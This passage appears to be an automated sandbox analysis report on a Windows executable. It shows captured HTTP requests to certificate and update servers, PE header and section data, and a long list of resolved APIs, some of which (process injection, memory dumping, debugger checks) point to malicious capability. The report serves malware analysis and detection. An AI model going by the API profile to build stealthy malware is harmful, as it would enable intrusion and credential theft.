- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.digicert.com",
- "version": "1.1",
- "path": "/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D",
- "data": "GET /MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAVG%2Fhgj9%2BGUHaOfzhTEYXM%3D HTTP/1.1\r\nCache-Control: max-age = 161796\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Tue, 28 May 2019 13:00:33 GMT\r\nIf-None-Match: \"5ced30f1-1d7\"\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.digicert.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://ocsp.pki.goog/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "ocsp.pki.goog",
- "version": "1.1",
- "path": "/gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D",
- "data": "GET /gsr2/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBTgXIsxbvr2lBkPpoIEVRE6gHlCnAQUm%2BIHV2ccHsBqBt5ZtJot39wZhi4CDQHjqTAc%2FHIGOD%2BaUx0%3D HTTP/1.1\r\nCache-Control: max-age = 86400\r\nConnection: Keep-Alive\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: ocsp.pki.goog\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://crl.microsoft.com/pki/crl/products/microsoftrootcert.crl",
- "user-agent": "Microsoft-CryptoAPI/6.1",
- "method": "GET",
- "host": "crl.microsoft.com",
- "version": "1.1",
- "path": "/pki/crl/products/microsoftrootcert.crl",
- "data": "GET /pki/crl/products/microsoftrootcert.crl HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nIf-Modified-Since: Thu, 07 Mar 2019 06:00:16 GMT\r\nUser-Agent: Microsoft-CryptoAPI/6.1\r\nHost: crl.microsoft.com\r\n\r\n",
- "port": 80
- },
- {
- "count": 1,
- "body": "",
- "uri": "http://redirector.gvt1.com/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
- "user-agent": "Microsoft BITS/7.5",
- "method": "HEAD",
- "host": "redirector.gvt1.com",
- "version": "1.1",
- "path": "/edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe",
- "data": "HEAD /edgedl/release2/chrome/ANcTHgjx95-y_74.0.3729.169/74.0.3729.169_73.0.3683.86_chrome_updater.exe HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Encoding: identity\r\nUser-Agent: Microsoft BITS/7.5\r\nX-Old-UID: cnt=0\r\nX-Last-HR: 0x0\r\nX-Last-HTTP-Status-Code: 0\r\nX-Retry-Count: 0\r\nX-HTTP-Attempts: 1\r\nHost: redirector.gvt1.com\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "pe": {
- "peid_signatures": null,
- "imports": [
- {
- "imports": [
- {
- "name": "GetCurrentThread",
- "address": "0x40a014"
- },
- {
- "name": "GetOEMCP",
- "address": "0x40a018"
- },
- {
- "name": "GetTickCount",
- "address": "0x40a01c"
- },
- {
- "name": "GetProcAddress",
- "address": "0x40a020"
- },
- {
- "name": "LoadLibraryA",
- "address": "0x40a024"
- },
- {
- "name": "GetLastError",
- "address": "0x40a028"
- },
- {
- "name": "GetCommandLineW",
- "address": "0x40a02c"
- },
- {
- "name": "GetProcessHeap",
- "address": "0x40a030"
- },
- {
- "name": "InterlockedIncrement",
- "address": "0x40a034"
- },
- {
- "name": "lstrlenA",
- "address": "0x40a038"
- },
- {
- "name": "GetVersionExA",
- "address": "0x40a03c"
- },
- {
- "name": "GetVersionExW",
- "address": "0x40a040"
- },
- {
- "name": "InterlockedDecrement",
- "address": "0x40a044"
- },
- {
- "name": "GetCommandLineA",
- "address": "0x40a048"
- },
- {
- "name": "VirtualAllocEx",
- "address": "0x40a04c"
- },
- {
- "name": "GetCurrentProcess",
- "address": "0x40a050"
- },
- {
- "name": "GetModuleHandleA",
- "address": "0x40a054"
- },
- {
- "name": "GetStartupInfoW",
- "address": "0x40a058"
- }
- ],
- "dll": "KERNEL32.dll"
- },
- {
- "imports": [
- {
- "name": "DefWindowProcW",
- "address": "0x40a068"
- },
- {
- "name": "LoadStringW",
- "address": "0x40a06c"
- },
- {
- "name": "SetActiveWindow",
- "address": "0x40a070"
- },
- {
- "name": "ReleaseCapture",
- "address": "0x40a074"
- },
- {
- "name": "CreateWindowExA",
- "address": "0x40a078"
- },
- {
- "name": "GetMenuStringW",
- "address": "0x40a07c"
- },
- {
- "name": "UnregisterClassA",
- "address": "0x40a080"
- },
- {
- "name": "DestroyWindow",
- "address": "0x40a084"
- },
- {
- "name": "RegisterClassW",
- "address": "0x40a088"
- },
- {
- "name": "SendMessageW",
- "address": "0x40a08c"
- },
- {
- "name": "CreateWindowExW",
- "address": "0x40a090"
- },
- {
- "name": "SetWindowLongW",
- "address": "0x40a094"
- },
- {
- "name": "LoadIconA",
- "address": "0x40a098"
- }
- ],
- "dll": "USER32.dll"
- },
- {
- "imports": [
- {
- "name": "RegOpenKeyExW",
- "address": "0x40a000"
- },
- {
- "name": "RegOpenKeyExA",
- "address": "0x40a004"
- }
- ],
- "dll": "ADVAPI32.dll"
- },
- {
- "imports": [
- {
- "name": "ImageList_Add",
- "address": "0x40a00c"
- }
- ],
- "dll": "COMCTL32.dll"
- },
- {
- "imports": [
- {
- "name": "SetupDecompressOrCopyFileA",
- "address": "0x40a060"
- }
- ],
- "dll": "SETUPAPI.dll"
- },
- {
- "imports": [
- {
- "name": "_exit",
- "address": "0x40a0a0"
- },
- {
- "name": "_c_exit",
- "address": "0x40a0a4"
- },
- {
- "name": "_cexit",
- "address": "0x40a0a8"
- },
- {
- "name": "exit",
- "address": "0x40a0ac"
- },
- {
- "name": "_wcmdln",
- "address": "0x40a0b0"
- },
- {
- "name": "__wgetmainargs",
- "address": "0x40a0b4"
- },
- {
- "name": "_initterm",
- "address": "0x40a0b8"
- },
- {
- "name": "__setusermatherr",
- "address": "0x40a0bc"
- },
- {
- "name": "_adjust_fdiv",
- "address": "0x40a0c0"
- },
- {
- "name": "__p__commode",
- "address": "0x40a0c4"
- },
- {
- "name": "__p__fmode",
- "address": "0x40a0c8"
- },
- {
- "name": "__set_app_type",
- "address": "0x40a0cc"
- },
- {
- "name": "_controlfp",
- "address": "0x40a0d0"
- },
- {
- "name": "__dllonexit",
- "address": "0x40a0d4"
- },
- {
- "name": "_onexit",
- "address": "0x40a0d8"
- },
- {
- "name": "_except_handler3",
- "address": "0x40a0dc"
- },
- {
- "name": "_XcptFilter",
- "address": "0x40a0e0"
- }
- ],
- "dll": "msvcrt.dll"
- }
- ],
- "digital_signers": null,
- "exported_dll_name": null,
- "actual_checksum": "0x0002d30a",
- "overlay": {
- "size": "0x00001f00",
- "offset": "0x00025000"
- },
- "imagebase": "0x00400000",
- "reported_checksum": "0x0002d30a",
- "icon_hash": null,
- "entrypoint": "0x004083d6",
- "timestamp": "2019-06-12 20:02:55",
- "osversion": "4.0",
- "sections": [
- {
- "name": ".text",
- "characteristics": "IMAGE_SCN_CNT_CODE|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_EXECUTE|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00001000",
- "size_of_data": "0x00008000",
- "entropy": "5.82",
- "raw_address": "0x00001000",
- "virtual_size": "0x000076b6",
- "characteristics_raw": "0xf0000020"
- },
- {
- "name": ".bss",
- "characteristics": "IMAGE_SCN_CNT_UNINITIALIZED_DATA|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x00009000",
- "size_of_data": "0x00000000",
- "entropy": "0.00",
- "raw_address": "0x00000000",
- "virtual_size": "0x00000030",
- "characteristics_raw": "0xc0000080"
- },
- {
- "name": ".rdata",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x0000a000",
- "size_of_data": "0x00001000",
- "entropy": "2.39",
- "raw_address": "0x00009000",
- "virtual_size": "0x0000061c",
- "characteristics_raw": "0x40000040"
- },
- {
- "name": ".data",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_SHARED|IMAGE_SCN_MEM_READ|IMAGE_SCN_MEM_WRITE",
- "virtual_address": "0x0000b000",
- "size_of_data": "0x0001a000",
- "entropy": "6.12",
- "raw_address": "0x0000a000",
- "virtual_size": "0x00019d54",
- "characteristics_raw": "0xd0000040"
- },
- {
- "name": ".reloc",
- "characteristics": "IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_DISCARDABLE|IMAGE_SCN_MEM_READ",
- "virtual_address": "0x00025000",
- "size_of_data": "0x00001000",
- "entropy": "0.68",
- "raw_address": "0x00024000",
- "virtual_size": "0x0000025c",
- "characteristics_raw": "0x42000040"
- }
- ],
- "resources": [],
- "dirents": [
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a104",
- "name": "IMAGE_DIRECTORY_ENTRY_IMPORT",
- "size": "0x0000008c"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESOURCE",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_EXCEPTION",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_SECURITY",
- "size": "0x00001f00"
- },
- {
- "virtual_address": "0x00025000",
- "name": "IMAGE_DIRECTORY_ENTRY_BASERELOC",
- "size": "0x00000118"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DEBUG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COPYRIGHT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_GLOBALPTR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_TLS",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x0000a000",
- "name": "IMAGE_DIRECTORY_ENTRY_IAT",
- "size": "0x000000e8"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR",
- "size": "0x00000000"
- },
- {
- "virtual_address": "0x00000000",
- "name": "IMAGE_DIRECTORY_ENTRY_RESERVED",
- "size": "0x00000000"
- }
- ],
- "exports": [],
- "guest_signers": {},
- "imphash": "7e4334085562a74ad98ab8806ba673ef",
- "icon_fuzzy": null,
- "icon": null,
- "pdbpath": null,
- "imported_dll_count": 6,
- "versioninfo": []
- }
- }
- [*] Resolved APIs: [
- "user32.dll.GetWindowContextHelpId",
- "kernel32.dll.VirtualAlloc",
- "kernel32.dll.VirtualProtect",
- "kernel32.dll.LoadLibraryA",
- "kernel32.dll.VirtualFree",
- "kernel32.dll.VirtualQuery",
- "kernel32.dll.GetConsoleCP",
- "kernel32.dll.CreatePipe",
- "kernel32.dll.ExpandEnvironmentStringsA",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.SetFilePointer",
- "kernel32.dll.SetEndOfFile",
- "kernel32.dll.lstrlenA",
- "kernel32.dll.GetEnvironmentVariableA",
- "kernel32.dll.WaitForSingleObject",
- "kernel32.dll.GetCurrentThreadId",
- "kernel32.dll.lstrcmpA",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.ReleaseMutex",
- "kernel32.dll.DuplicateHandle",
- "kernel32.dll.lstrcatA",
- "kernel32.dll.ExitThread",
- "kernel32.dll.GetModuleHandleA",
- "kernel32.dll.GetACP",
- "kernel32.dll.OpenProcess",
- "kernel32.dll.Sleep",
- "kernel32.dll.GetFileInformationByHandle",
- "kernel32.dll.GetLastError",
- "kernel32.dll.OutputDebugStringW",
- "kernel32.dll.CreateFileA",
- "kernel32.dll.GetCurrentThread",
- "kernel32.dll.DeleteFileA",
- "kernel32.dll.GlobalAlloc",
- "kernel32.dll.lstrcpyA",
- "kernel32.dll.CloseHandle",
- "kernel32.dll.ResetEvent",
- "kernel32.dll.GetLocalTime",
- "kernel32.dll.GetProcAddress",
- "kernel32.dll.CreateFileMappingA",
- "kernel32.dll.GetFileSize",
- "kernel32.dll.DeleteCriticalSection",
- "kernel32.dll.ExitProcess",
- "kernel32.dll.LCMapStringW",
- "kernel32.dll.lstrcpynA",
- "kernel32.dll.InterlockedDecrement",
- "kernel32.dll.AddConsoleAliasW",
- "kernel32.dll.SystemTimeToFileTime",
- "kernel32.dll.GetModuleHandleW",
- "kernel32.dll.CreateProcessA",
- "kernel32.dll.AddAtomW",
- "kernel32.dll.CreateDirectoryA",
- "kernel32.dll.OpenMutexW",
- "kernel32.dll.LocalShrink",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.FlushFileBuffers",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.WriteConsoleW",
- "kernel32.dll.SetFilePointerEx",
- "kernel32.dll.HeapReAlloc",
- "kernel32.dll.HeapSize",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.GetProcessHeap",
- "kernel32.dll.GetStringTypeW",
- "kernel32.dll.SetStdHandle",
- "kernel32.dll.FreeEnvironmentStringsW",
- "kernel32.dll.GetEnvironmentStringsW",
- "kernel32.dll.GetCommandLineA",
- "kernel32.dll.GetCPInfo",
- "kernel32.dll.GetOEMCP",
- "kernel32.dll.IsValidCodePage",
- "kernel32.dll.FindNextFileA",
- "kernel32.dll.FindFirstFileExA",
- "kernel32.dll.FindClose",
- "kernel32.dll.DeviceIoControl",
- "kernel32.dll.OutputDebugStringA",
- "kernel32.dll.WriteConsoleA",
- "kernel32.dll.GetShortPathNameA",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.GetCommandLineW",
- "kernel32.dll.SetLastError",
- "kernel32.dll.EraseTape",
- "kernel32.dll.GetFileType",
- "kernel32.dll.HeapCreate",
- "kernel32.dll.GetFileSizeEx",
- "kernel32.dll.GlobalGetAtomNameA",
- "kernel32.dll.GetModuleFileNameA",
- "kernel32.dll.ReadFile",
- "kernel32.dll.HeapAlloc",
- "kernel32.dll.HeapFree",
- "kernel32.dll.GetModuleHandleExW",
- "kernel32.dll.WideCharToMultiByte",
- "kernel32.dll.MultiByteToWideChar",
- "kernel32.dll.WriteFile",
- "kernel32.dll.LoadLibraryExW",
- "kernel32.dll.FreeLibrary",
- "kernel32.dll.TlsFree",
- "kernel32.dll.LocalFree",
- "kernel32.dll.QueryPerformanceCounter",
- "kernel32.dll.GetCurrentProcessId",
- "kernel32.dll.GetSystemTimeAsFileTime",
- "kernel32.dll.InitializeSListHead",
- "kernel32.dll.UnhandledExceptionFilter",
- "kernel32.dll.SetUnhandledExceptionFilter",
- "kernel32.dll.GetStartupInfoW",
- "kernel32.dll.IsProcessorFeaturePresent",
- "kernel32.dll.TerminateProcess",
- "kernel32.dll.RaiseException",
- "kernel32.dll.RtlUnwind",
- "kernel32.dll.EnterCriticalSection",
- "kernel32.dll.LeaveCriticalSection",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "kernel32.dll.TlsAlloc",
- "kernel32.dll.TlsGetValue",
- "kernel32.dll.TlsSetValue",
- "user32.dll.TranslateMessage",
- "user32.dll.BeginPaint",
- "user32.dll.ChildWindowFromPoint",
- "user32.dll.LoadImageW",
- "user32.dll.UnhookWinEvent",
- "user32.dll.GetMenu",
- "user32.dll.GetFocus",
- "user32.dll.GetMenuItemCount",
- "user32.dll.DrawIcon",
- "user32.dll.RegisterClassExA",
- "user32.dll.TrackPopupMenu",
- "user32.dll.wsprintfA",
- "user32.dll.DialogBoxIndirectParamA",
- "user32.dll.IsChild",
- "user32.dll.LoadAcceleratorsA",
- "user32.dll.CharNextW",
- "user32.dll.LoadAcceleratorsW",
- "user32.dll.GetClipboardData",
- "user32.dll.OemToCharA",
- "user32.dll.LoadCursorW",
- "user32.dll.SetDlgItemTextA",
- "user32.dll.wsprintfW",
- "user32.dll.CheckDlgButton",
- "user32.dll.GetDesktopWindow",
- "gdi32.dll.CreateFontA",
- "gdi32.dll.StartDocA",
- "gdi32.dll.CreateDCW",
- "gdi32.dll.SetWindowExtEx",
- "gdi32.dll.SetViewportExtEx",
- "gdi32.dll.CreateMetaFileA",
- "gdi32.dll.TextOutA",
- "gdi32.dll.SetMapMode",
- "gdi32.dll.SetTextColor",
- "winspool.drv.GetPrinterA",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegFlushKey",
- "advapi32.dll.RegSetValueExW",
- "advapi32.dll.GetUserNameW",
- "advapi32.dll.RegOpenKeyW",
- "shell32.dll.ShellExecuteA",
- "shell32.dll.SHGetSpecialFolderPathA",
- "ole32.dll.CoCreateInstance",
- "ole32.dll.CoUninitialize",
- "ole32.dll.CoCreateGuid",
- "ole32.dll.CoInitializeSecurity",
- "ole32.dll.CoInitializeEx",
- "ole32.dll.CoInitialize",
- "oleaut32.dll.#8",
- "oleaut32.dll.#6",
- "oleaut32.dll.#2",
- "oleaut32.dll.#9",
- "shlwapi.dll.StrStrA",
- "kernel32.dll.InitializeCriticalSectionEx",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.LCMapStringEx",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "ole32.dll.OleInitialize",
- "cryptbase.dll.SystemFunction036",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoTaskMemAlloc",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "ole32.dll.CoTaskMemFree",
- "comctl32.dll.#236",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "apphelp.dll.ApphelpCheckShellObject",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "shell32.dll.#102",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "comctl32.dll.#332",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "comctl32.dll.#386",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#338",
- "sechost.dll.ConvertSidToStringSidW",
- "propsys.dll.#430",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegGetValueW",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "oleaut32.dll.#500",
- "wininet.dll.InternetReadFile",
- "rasapi32.dll.RasConnectionNotificationW",
- "sechost.dll.NotifyServiceStatusChangeA",
- "rpcrt4.dll.RpcBindingFree",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "cscapi.dll.CscNetApiGetInterface",
- "advapi32.dll.LsaOpenPolicy",
- "advapi32.dll.LsaQueryInformationPolicy",
- "netutils.dll.NetApiBufferAllocate",
- "advapi32.dll.LsaFreeMemory",
- "advapi32.dll.LsaClose",
- "netutils.dll.NetApiBufferFree",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.SetConsoleInputExeNameW",
- "rpcrt4.dll.I_RpcSNCHOption",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.ControlService",
- "sechost.dll.QueryServiceStatus",
- "sechost.dll.StartServiceW",
- "secur32.dll.GetUserNameExW",
- "secur32.dll.InitializeSecurityContextW",
- "secur32.dll.FreeCredentialsHandle",
- "secur32.dll.AcquireCredentialsHandleW",
- "secur32.dll.QuerySecurityPackageInfoW",
- "secur32.dll.CompleteAuthToken",
- "secur32.dll.FreeContextBuffer",
- "secur32.dll.GetUserNameExA",
- "winscard.dll.SCardEstablishContext",
- "winscard.dll.SCardReleaseContext",
- "winscard.dll.SCardGetStatusChangeW",
- "winscard.dll.SCardListReadersW",
- "ws2_32.dll.#151",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#21",
- "ws2_32.dll.#19",
- "ws2_32.dll.#16",
- "ws2_32.dll.#10",
- "ws2_32.dll.#111",
- "ws2_32.dll.#116",
- "ws2_32.dll.#115",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.#4",
- "ws2_32.dll.#23",
- "ws2_32.dll.#11",
- "ws2_32.dll.#3",
- "ws2_32.dll.#18",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.#9",
- "userenv.dll.CreateEnvironmentBlock",
- "userenv.dll.DestroyEnvironmentBlock",
- "dbghelp.dll.MiniDumpWriteDump",
- "wtsapi32.dll.WTSEnumerateSessionsW",
- "ole32.dll.CoSetProxyBlanket",
- "kernel32.dll.InitializeCriticalSection",
- "kernel32.dll.TryEnterCriticalSection",
- "kernel32.dll.SizeofResource",
- "kernel32.dll.InitAtomTable",
- "kernel32.dll.SetHandleCount",
- "kernel32.dll.LoadModule",
- "kernel32.dll.ClearCommError",
- "kernel32.dll.GetCommConfig",
- "kernel32.dll.GetCommMask",
- "kernel32.dll.TransmitCommChar",
- "kernel32.dll.GetTapeParameters",
- "kernel32.dll.MulDiv",
- "kernel32.dll.GetSystemTime",
- "kernel32.dll.GetTimeZoneInformation",
- "kernel32.dll.FileTimeToSystemTime",
- "kernel32.dll.CompareFileTime",
- "kernel32.dll.DosDateTimeToFileTime",
- "kernel32.dll.GetTickCount",
- "kernel32.dll.GetNamedPipeInfo",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.lstrcmpiA",
- "kernel32.dll.lstrcpyW",
- "kernel32.dll.lstrcatW",
- "kernel32.dll.lstrlenW",
- "kernel32.dll._lcreat",
- "kernel32.dll.CreateMutexA",
- "kernel32.dll.CreateMutexW",
- "kernel32.dll.CreateEventA",
- "kernel32.dll.CreateEventW",
- "kernel32.dll.OpenSemaphoreW",
- "kernel32.dll.OpenWaitableTimerW",
- "kernel32.dll.CancelWaitableTimer",
- "kernel32.dll.LoadLibraryW",
- "kernel32.dll.GetStartupInfoA",
- "kernel32.dll.FindResourceA",
- "kernel32.dll.GetProfileIntW",
- "kernel32.dll.WriteProfileStringW",
- "kernel32.dll.GetPrivateProfileIntW",
- "kernel32.dll.GetPrivateProfileStringW",
- "kernel32.dll.GetPrivateProfileSectionW",
- "kernel32.dll.GetDriveTypeA",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetSystemDirectoryA",
- "kernel32.dll.GetSystemDirectoryW",
- "kernel32.dll.GetTempFileNameA",
- "kernel32.dll.GetSystemWindowsDirectoryA",
- "kernel32.dll.GetCurrentDirectoryA",
- "kernel32.dll.GetDllDirectoryA",
- "kernel32.dll.GetDllDirectoryW",
- "kernel32.dll.GetDiskFreeSpaceA",
- "kernel32.dll.RemoveDirectoryW",
- "kernel32.dll.GetFullPathNameA",
- "kernel32.dll.DefineDosDeviceW",
- "kernel32.dll.GetFileAttributesA",
- "kernel32.dll.GetFileAttributesW",
- "kernel32.dll.GetFileAttributesExA",
- "kernel32.dll.FindFirstFileA",
- "kernel32.dll.SearchPathA",
- "kernel32.dll.SearchPathW",
- "kernel32.dll.CheckRemoteDebuggerPresent",
- "kernel32.dll.ReplaceFileW",
- "kernel32.dll.CreateNamedPipeA",
- "kernel32.dll.FindCloseChangeNotification",
- "kernel32.dll.GetDefaultCommConfigA",
- "kernel32.dll.GetComputerNameExA",
- "kernel32.dll.GetComputerNameExW",
- "kernel32.dll.CancelTimerQueueTimer",
- "kernel32.dll.VerifyVersionInfoW",
- "kernel32.dll.OpenJobObjectA",
- "kernel32.dll.DeleteVolumeMountPointA",
- "kernel32.dll.DeleteVolumeMountPointW",
- "kernel32.dll.GetVolumeNameForVolumeMountPointW",
- "kernel32.dll.GetVolumePathNamesForVolumeNameA",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.FindActCtxSectionGuid",
- "kernel32.dll.CompareStringA",
- "kernel32.dll.CompareStringW",
- "kernel32.dll.GetCalendarInfoA",
- "kernel32.dll.GetTimeFormatW",
- "kernel32.dll.IsValidLocale",
- "kernel32.dll.GetGeoInfoA",
- "kernel32.dll.GetThreadLocale",
- "kernel32.dll.GetUserDefaultLCID",
- "kernel32.dll.WriteConsoleOutputCharacterW",
- "kernel32.dll.FillConsoleOutputCharacterW",
- "kernel32.dll.GetConsoleFontSize",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.DebugBreakProcess",
- "kernel32.dll.WaitNamedPipeW",
- "kernel32.dll.GetExitCodeProcess",
- "kernel32.dll.lstrcmpiW",
- "kernel32.dll.GetModuleFileNameW",
- "kernel32.dll.LockResource",
- "kernel32.dll.LoadResource",
- "kernel32.dll.FindResourceW",
- "kernel32.dll.SetHandleInformation",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "kernel32.dll.PeekNamedPipe",
- "kernel32.dll.GetTimeFormatA",
- "kernel32.dll.FreeResource",
- "kernel32.dll.GetDateFormatA",
- "kernel32.dll.MoveFileExW",
- "kernel32.dll.CreateProcessW",
- "kernel32.dll.GlobalLock",
- "kernel32.dll.InterlockedIncrement",
- "kernel32.dll.CreateDirectoryW",
- "kernel32.dll.DeleteFileW",
- "kernel32.dll.MoveFileW",
- "kernel32.dll.CreateToolhelp32Snapshot",
- "kernel32.dll.Process32NextW",
- "kernel32.dll.Process32FirstW",
- "kernel32.dll.lstrcmpW",
- "kernel32.dll.SetFileTime",
- "kernel32.dll.ProcessIdToSessionId",
- "kernel32.dll.SleepEx",
- "kernel32.dll.GetFileTime",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindNextFileW",
- "kernel32.dll.SetFileAttributesW",
- "kernel32.dll.QueryPerformanceFrequency",
- "kernel32.dll.OpenEventW",
- "kernel32.dll.SetEvent",
- "kernel32.dll.LocalAlloc",
- "kernel32.dll.GetComputerNameW",
- "kernel32.dll.GetComputerNameA",
- "kernel32.dll.SetThreadPriority",
- "kernel32.dll.ResumeThread",
- "kernel32.dll.CreateSemaphoreW",
- "kernel32.dll.QueueUserAPC",
- "kernel32.dll.GetQueuedCompletionStatus",
- "kernel32.dll.GetThreadSelectorEntry",
- "kernel32.dll.TerminateThread",
- "kernel32.dll.GetThreadIOPendingFlag",
- "kernel32.dll.RequestWakeupLatency",
